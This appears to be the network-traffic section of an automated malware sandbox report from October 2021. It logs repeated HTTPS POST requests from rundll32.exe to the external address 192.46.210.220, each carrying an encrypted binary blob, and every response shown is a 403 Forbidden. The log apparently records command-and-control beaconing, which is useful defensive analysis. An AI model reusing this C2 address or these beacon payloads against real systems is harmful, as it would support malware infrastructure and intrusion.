                                                                                                          2021-10-28 03:08:55 UTC69OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:55 UTC79INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:55 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          15192.168.2.649819192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:55 UTC74OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:55 UTC74OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:56 UTC79INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:56 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          16192.168.2.649825192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:59 UTC79OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:59 UTC79OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:59 UTC84INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:59 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          17192.168.2.649827192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:59 UTC84OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:59 UTC84OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:00 UTC89INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:00 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          18192.168.2.649833192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:02 UTC89OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:02 UTC89OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:03 UTC94INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:03 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          19192.168.2.649835192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:03 UTC94OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:03 UTC94OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:04 UTC99INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:04 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.649766192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:31 UTC9OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:31 UTC10OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:31 UTC19INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:31 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          20192.168.2.649841192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:06 UTC99OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:06 UTC99OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:07 UTC104INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:07 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          21192.168.2.649843192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:07 UTC104OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:07 UTC104OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:08 UTC109INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:08 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          22192.168.2.649851192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:10 UTC109OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:10 UTC109OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:11 UTC114INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:11 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          23192.168.2.649853192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:11 UTC114OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:11 UTC114OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:12 UTC119INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:12 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          24192.168.2.649860192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:14 UTC119OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:14 UTC119OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:15 UTC124INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:15 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          25192.168.2.649862192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:15 UTC124OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:09:15 UTC124OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:09:16 UTC129INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:09:16 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          26192.168.2.649867192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:09:19 UTC129OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
